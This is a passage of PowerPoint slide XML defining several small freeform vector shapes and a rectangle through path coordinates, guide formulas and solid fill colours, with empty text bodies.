                  <a:gd name="T26" fmla="*/ 0 w 15"/>
                  <a:gd name="T27" fmla="*/ 40 h 63"/>
                  <a:gd name="T28" fmla="*/ 0 w 15"/>
                  <a:gd name="T29" fmla="*/ 29 h 63"/>
                  <a:gd name="T30" fmla="*/ 0 w 15"/>
                  <a:gd name="T31" fmla="*/ 19 h 63"/>
                  <a:gd name="T32" fmla="*/ 1 w 15"/>
                  <a:gd name="T33" fmla="*/ 8 h 63"/>
                  <a:gd name="T34" fmla="*/ 4 w 15"/>
                  <a:gd name="T35" fmla="*/ 0 h 63"/>
                  <a:gd name="T36" fmla="*/ 15 w 15"/>
                  <a:gd name="T37" fmla="*/ 0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63"/>
                  <a:gd name="T59" fmla="*/ 15 w 15"/>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63">
                    <a:moveTo>
                      <a:pt x="15" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="15" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="8CD8FF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10714" name="Freeform 121"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1370" y="2576"/>
                <a:ext cx="12" cy="50"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 12 w 12"/>
                  <a:gd name="T1" fmla="*/ 1 h 50"/>
                  <a:gd name="T2" fmla="*/ 12 w 12"/>
                  <a:gd name="T3" fmla="*/ 1 h 50"/>
                  <a:gd name="T4" fmla="*/ 11 w 12"/>
                  <a:gd name="T5" fmla="*/ 2 h 50"/>
                  <a:gd name="T6" fmla="*/ 10 w 12"/>
                  <a:gd name="T7" fmla="*/ 4 h 50"/>
                  <a:gd name="T8" fmla="*/ 9 w 12"/>
                  <a:gd name="T9" fmla="*/ 9 h 50"/>
                  <a:gd name="T10" fmla="*/ 9 w 12"/>
                  <a:gd name="T11" fmla="*/ 15 h 50"/>
                  <a:gd name="T12" fmla="*/ 8 w 12"/>
                  <a:gd name="T13" fmla="*/ 24 h 50"/>
                  <a:gd name="T14" fmla="*/ 8 w 12"/>
                  <a:gd name="T15" fmla="*/ 36 h 50"/>
                  <a:gd name="T16" fmla="*/ 9 w 12"/>
                  <a:gd name="T17" fmla="*/ 50 h 50"/>
                  <a:gd name="T18" fmla="*/ 2 w 12"/>
                  <a:gd name="T19" fmla="*/ 50 h 50"/>
                  <a:gd name="T20" fmla="*/ 2 w 12"/>
                  <a:gd name="T21" fmla="*/ 49 h 50"/>
                  <a:gd name="T22" fmla="*/ 2 w 12"/>
                  <a:gd name="T23" fmla="*/ 45 h 50"/>
                  <a:gd name="T24" fmla="*/ 1 w 12"/>
                  <a:gd name="T25" fmla="*/ 38 h 50"/>
                  <a:gd name="T26" fmla="*/ 1 w 12"/>
                  <a:gd name="T27" fmla="*/ 31 h 50"/>
                  <a:gd name="T28" fmla="*/ 0 w 12"/>
                  <a:gd name="T29" fmla="*/ 23 h 50"/>
                  <a:gd name="T30" fmla="*/ 1 w 12"/>
                  <a:gd name="T31" fmla="*/ 15 h 50"/>
                  <a:gd name="T32" fmla="*/ 2 w 12"/>
                  <a:gd name="T33" fmla="*/ 7 h 50"/>
                  <a:gd name="T34" fmla="*/ 4 w 12"/>
                  <a:gd name="T35" fmla="*/ 0 h 50"/>
                  <a:gd name="T36" fmla="*/ 12 w 12"/>
                  <a:gd name="T37" fmla="*/ 1 h 5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50"/>
                  <a:gd name="T59" fmla="*/ 12 w 12"/>
                  <a:gd name="T60" fmla="*/ 50 h 5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50">
                    <a:moveTo>
                      <a:pt x="12" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="12" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="A5EDFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10715" name="Freeform 122"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1371" y="2583"/>
                <a:ext cx="9" cy="36"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 9 w 9"/>
                  <a:gd name="T1" fmla="*/ 0 h 36"/>
                  <a:gd name="T2" fmla="*/ 9 w 9"/>
                  <a:gd name="T3" fmla="*/ 0 h 36"/>
                  <a:gd name="T4" fmla="*/ 8 w 9"/>
                  <a:gd name="T5" fmla="*/ 1 h 36"/>
                  <a:gd name="T6" fmla="*/ 8 w 9"/>
                  <a:gd name="T7" fmla="*/ 3 h 36"/>
                  <a:gd name="T8" fmla="*/ 7 w 9"/>
                  <a:gd name="T9" fmla="*/ 6 h 36"/>
                  <a:gd name="T10" fmla="*/ 6 w 9"/>
                  <a:gd name="T11" fmla="*/ 10 h 36"/>
                  <a:gd name="T12" fmla="*/ 6 w 9"/>
                  <a:gd name="T13" fmla="*/ 17 h 36"/>
                  <a:gd name="T14" fmla="*/ 6 w 9"/>
                  <a:gd name="T15" fmla="*/ 25 h 36"/>
                  <a:gd name="T16" fmla="*/ 7 w 9"/>
                  <a:gd name="T17" fmla="*/ 36 h 36"/>
                  <a:gd name="T18" fmla="*/ 2 w 9"/>
                  <a:gd name="T19" fmla="*/ 36 h 36"/>
                  <a:gd name="T20" fmla="*/ 1 w 9"/>
                  <a:gd name="T21" fmla="*/ 36 h 36"/>
                  <a:gd name="T22" fmla="*/ 1 w 9"/>
                  <a:gd name="T23" fmla="*/ 32 h 36"/>
                  <a:gd name="T24" fmla="*/ 1 w 9"/>
                  <a:gd name="T25" fmla="*/ 28 h 36"/>
                  <a:gd name="T26" fmla="*/ 0 w 9"/>
                  <a:gd name="T27" fmla="*/ 22 h 36"/>
                  <a:gd name="T28" fmla="*/ 0 w 9"/>
                  <a:gd name="T29" fmla="*/ 16 h 36"/>
                  <a:gd name="T30" fmla="*/ 0 w 9"/>
                  <a:gd name="T31" fmla="*/ 10 h 36"/>
                  <a:gd name="T32" fmla="*/ 1 w 9"/>
                  <a:gd name="T33" fmla="*/ 4 h 36"/>
                  <a:gd name="T34" fmla="*/ 3 w 9"/>
                  <a:gd name="T35" fmla="*/ 0 h 36"/>
                  <a:gd name="T36" fmla="*/ 9 w 9"/>
                  <a:gd name="T37" fmla="*/ 0 h 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36"/>
                  <a:gd name="T59" fmla="*/ 9 w 9"/>
                  <a:gd name="T60" fmla="*/ 36 h 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36">
                    <a:moveTo>
                      <a:pt x="9" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="BFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10716" name="Rectangle 123"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1248" y="2573"/>
                <a:ext cx="4" cy="118"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" altLang="en-US">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10717" name="Freeform 124"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1290" y="2571"/>
                <a:ext cx="46" cy="55"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4 w 46"/>
                  <a:gd name="T1" fmla="*/ 6 h 55"/>
                  <a:gd name="T2" fmla="*/ 4 w 46"/>
                  <a:gd name="T3" fmla="*/ 7 h 55"/>
                  <a:gd name="T4" fmla="*/ 3 w 46"/>
                  <a:gd name="T5" fmla="*/ 9 h 55"/>
                  <a:gd name="T6" fmla="*/ 1 w 46"/>
                  <a:gd name="T7" fmla="*/ 14 h 55"/>
                  <a:gd name="T8" fmla="*/ 0 w 46"/>
                  <a:gd name="T9" fmla="*/ 20 h 55"/>
                  <a:gd name="T10" fmla="*/ 0 w 46"/>
                  <a:gd name="T11" fmla="*/ 28 h 55"/>
                  <a:gd name="T12" fmla="*/ 0 w 46"/>
                  <a:gd name="T13" fmla="*/ 36 h 55"/>
                  <a:gd name="T14" fmla="*/ 0 w 46"/>
                  <a:gd name="T15" fmla="*/ 46 h 55"/>
                  <a:gd name="T16" fmla="*/ 3 w 46"/>
                  <a:gd name="T17" fmla="*/ 55 h 55"/>
                  <a:gd name="T18" fmla="*/ 3 w 46"/>
                  <a:gd name="T19" fmla="*/ 54 h 55"/>
                  <a:gd name="T20" fmla="*/ 3 w 46"/>
                  <a:gd name="T21" fmla="*/ 53 h 55"/>
                  <a:gd name="T22" fmla="*/ 3 w 46"/>
                  <a:gd name="T23" fmla="*/ 51 h 55"/>
                  <a:gd name="T24" fmla="*/ 3 w 46"/>
                  <a:gd name="T25" fmla="*/ 49 h 55"/>
                  <a:gd name="T26" fmla="*/ 3 w 46"/>
                  <a:gd name="T27" fmla="*/ 46 h 55"/>
                  <a:gd name="T28" fmla="*/ 4 w 46"/>
                  <a:gd name="T29" fmla="*/ 42 h 55"/>
                  <a:gd name="T30" fmla="*/ 4 w 46"/>
                  <a:gd name="T31" fmla="*/ 39 h 55"/>
                  <a:gd name="T32" fmla="*/ 5 w 46"/>
                  <a:gd name="T33" fmla="*/ 35 h 55"/>
                  <a:gd name="T34" fmla="*/ 6 w 46"/>
                  <a:gd name="T35" fmla="*/ 32 h 55"/>
                  <a:gd name="T36" fmla="*/ 7 w 46"/>
                  <a:gd name="T37" fmla="*/ 28 h 55"/>
                  <a:gd name="T38" fmla="*/ 8 w 46"/>
                  <a:gd name="T39" fmla="*/ 25 h 55"/>
                  <a:gd name="T40" fmla="*/ 11 w 46"/>
                  <a:gd name="T41" fmla="*/ 21 h 55"/>
                  <a:gd name="T42" fmla="*/ 14 w 46"/>
                  <a:gd name="T43" fmla="*/ 19 h 55"/>
                  <a:gd name="T44" fmla="*/ 17 w 46"/>
                  <a:gd name="T45" fmla="*/ 16 h 55"/>
                  <a:gd name="T46" fmla="*/ 21 w 46"/>
                  <a:gd name="T47" fmla="*/ 14 h 55"/>
                  <a:gd name="T48" fmla="*/ 26 w 46"/>
                  <a:gd name="T49" fmla="*/ 14 h 55"/>
                  <a:gd name="T50" fmla="*/ 26 w 46"/>
                  <a:gd name="T51" fmla="*/ 13 h 55"/>
                  <a:gd name="T52" fmla="*/ 26 w 46"/>
                  <a:gd name="T53" fmla="*/ 13 h 55"/>
                  <a:gd name="T54" fmla="*/ 28 w 46"/>
                  <a:gd name="T55" fmla="*/ 12 h 55"/>
                  <a:gd name="T56" fmla="*/ 29 w 46"/>
                  <a:gd name="T57" fmla="*/ 11 h 55"/>
                  <a:gd name="T58" fmla="*/ 33 w 46"/>
                  <a:gd name="T59" fmla="*/ 9 h 55"/>
                  <a:gd name="T60" fmla="*/ 36 w 46"/>
                  <a:gd name="T61" fmla="*/ 7 h 55"/>
                  <a:gd name="T62" fmla="*/ 41 w 46"/>
                  <a:gd name="T63" fmla="*/ 5 h 55"/>
                  <a:gd name="T64" fmla="*/ 46 w 46"/>
                  <a:gd name="T65" fmla="*/ 2 h 55"/>
                  <a:gd name="T66" fmla="*/ 46 w 46"/>
                  <a:gd name="T67" fmla="*/ 2 h 55"/>
                  <a:gd name="T68" fmla="*/ 45 w 46"/>
                  <a:gd name="T69" fmla="*/ 2 h 55"/>
                  <a:gd name="T70" fmla="*/ 43 w 46"/>
                  <a:gd name="T71" fmla="*/ 2 h 55"/>
                  <a:gd name="T72" fmla="*/ 42 w 46"/>
                  <a:gd name="T73" fmla="*/ 1 h 55"/>
                  <a:gd name="T74" fmla="*/ 40 w 46"/>
                  <a:gd name="T75" fmla="*/ 1 h 55"/>
                  <a:gd name="T76" fmla="*/ 38 w 46"/>
                  <a:gd name="T77" fmla="*/ 1 h 55"/>
                  <a:gd name="T78" fmla="*/ 35 w 46"/>
                  <a:gd name="T79" fmla="*/ 1 h 55"/>
                  <a:gd name="T80" fmla="*/ 32 w 46"/>
                  <a:gd name="T81" fmla="*/ 0 h 55"/>
                  <a:gd name="T82" fmla="*/ 28 w 46"/>
                  <a:gd name="T83" fmla="*/ 0 h 55"/>
                  <a:gd name="T84" fmla="*/ 26 w 46"/>
                  <a:gd name="T85" fmla="*/ 0 h 55"/>
                  <a:gd name="T86" fmla="*/ 22 w 46"/>
                  <a:gd name="T87" fmla="*/ 1 h 55"/>
                  <a:gd name="T88" fmla="*/ 19 w 46"/>
                  <a:gd name="T89" fmla="*/ 1 h 55"/>
                  <a:gd name="T90" fmla="*/ 14 w 46"/>
                  <a:gd name="T91" fmla="*/ 1 h 55"/>
                  <a:gd name="T92" fmla="*/ 11 w 46"/>
                  <a:gd name="T93" fmla="*/ 2 h 55"/>
                  <a:gd name="T94" fmla="*/ 7 w 46"/>
                  <a:gd name="T95" fmla="*/ 4 h 55"/>
                  <a:gd name="T96" fmla="*/ 4 w 46"/>
                  <a:gd name="T97" fmla="*/ 6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6"/>
                  <a:gd name="T148" fmla="*/ 0 h 55"/>
                  <a:gd name="T149" fmla="*/ 46 w 46"/>
                  <a:gd name="T150" fmla="*/ 55 h 5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6" h="55">
                    <a:moveTo>
                      <a:pt x="4" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="6"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="999999"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10718" name="Freeform 125"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1226" y="2612"/>
                <a:ext cx="37" cy="9"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 37"/>
                  <a:gd name="T1" fmla="*/ 6 h 9"/>
                  <a:gd name="T2" fmla="*/ 0 w 37"/>
                  <a:gd name="T3" fmla="*/ 6 h 9"/>
                  <a:gd name="T4" fmla="*/ 0 w 37"/>
                  <a:gd name="T5" fmla="*/ 6 h 9"/>
                  <a:gd name="T6" fmla="*/ 1 w 37"/>
                  <a:gd name="T7" fmla="*/ 5 h 9"/>
                  <a:gd name="T8" fmla="*/ 1 w 37"/>
                  <a:gd name="T9" fmla="*/ 5 h 9"/>
                  <a:gd name="T10" fmla="*/ 2 w 37"/>
                  <a:gd name="T11" fmla="*/ 3 h 9"/>
                  <a:gd name="T12" fmla="*/ 4 w 37"/>
                  <a:gd name="T13" fmla="*/ 2 h 9"/>
                  <a:gd name="T14" fmla="*/ 5 w 37"/>
                  <a:gd name="T15" fmla="*/ 2 h 9"/>
                  <a:gd name="T16" fmla="*/ 7 w 37"/>
                  <a:gd name="T17" fmla="*/ 1 h 9"/>
                  <a:gd name="T18" fmla="*/ 9 w 37"/>
                  <a:gd name="T19" fmla="*/ 0 h 9"/>
                  <a:gd name="T20" fmla="*/ 12 w 37"/>
                  <a:gd name="T21" fmla="*/ 0 h 9"/>
                  <a:gd name="T22" fmla="*/ 15 w 37"/>
                  <a:gd name="T23" fmla="*/ 0 h 9"/>
                  <a:gd name="T24" fmla="*/ 19 w 37"/>
                  <a:gd name="T25" fmla="*/ 0 h 9"/>
                  <a:gd name="T26" fmla="*/ 22 w 37"/>
                  <a:gd name="T27" fmla="*/ 0 h 9"/>
                  <a:gd name="T28" fmla="*/ 27 w 37"/>
                  <a:gd name="T29" fmla="*/ 1 h 9"/>
                  <a:gd name="T30" fmla="*/ 32 w 37"/>
                  <a:gd name="T31" fmla="*/ 1 h 9"/>
                  <a:gd name="T32" fmla="*/ 37 w 37"/>
                  <a:gd name="T33" fmla="*/ 3 h 9"/>
                  <a:gd name="T34" fmla="*/ 37 w 37"/>
                  <a:gd name="T35" fmla="*/ 6 h 9"/>
                  <a:gd name="T36" fmla="*/ 36 w 37"/>
                  <a:gd name="T37" fmla="*/ 6 h 9"/>
                  <a:gd name="T38" fmla="*/ 36 w 37"/>
                  <a:gd name="T39" fmla="*/ 5 h 9"/>
                  <a:gd name="T40" fmla="*/ 34 w 37"/>
                  <a:gd name="T41" fmla="*/ 5 h 9"/>
                  <a:gd name="T42" fmla="*/ 33 w 37"/>
                  <a:gd name="T43" fmla="*/ 5 h 9"/>
                  <a:gd name="T44" fmla="*/ 30 w 37"/>
                  <a:gd name="T45" fmla="*/ 3 h 9"/>
                  <a:gd name="T46" fmla="*/ 28 w 37"/>
                  <a:gd name="T47" fmla="*/ 3 h 9"/>
                  <a:gd name="T48" fmla="*/ 25 w 37"/>
                  <a:gd name="T49" fmla="*/ 2 h 9"/>
                  <a:gd name="T50" fmla="*/ 22 w 37"/>
                  <a:gd name="T51" fmla="*/ 2 h 9"/>
                  <a:gd name="T52" fmla="*/ 19 w 37"/>
                  <a:gd name="T53" fmla="*/ 2 h 9"/>
                  <a:gd name="T54" fmla="*/ 15 w 37"/>
                  <a:gd name="T55" fmla="*/ 2 h 9"/>
                  <a:gd name="T56" fmla="*/ 13 w 37"/>
                  <a:gd name="T57" fmla="*/ 2 h 9"/>
                  <a:gd name="T58" fmla="*/ 9 w 37"/>
                  <a:gd name="T59" fmla="*/ 3 h 9"/>
                  <a:gd name="T60" fmla="*/ 7 w 37"/>
                  <a:gd name="T61" fmla="*/ 5 h 9"/>
                  <a:gd name="T62" fmla="*/ 5 w 37"/>
                  <a:gd name="T63" fmla="*/ 6 h 9"/>
                  <a:gd name="T64" fmla="*/ 2 w 37"/>
                  <a:gd name="T65" fmla="*/ 7 h 9"/>
                  <a:gd name="T66" fmla="*/ 0 w 37"/>
                  <a:gd name="T67" fmla="*/ 9 h 9"/>
                  <a:gd name="T68" fmla="*/ 0 w 37"/>
                  <a:gd name="T69" fmla="*/ 6 h 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9"/>
                  <a:gd name="T107" fmla="*/ 37 w 37"/>
                  <a:gd name="T108" fmla="*/ 9 h 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9">
                    <a:moveTo>
                      <a:pt x="0" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
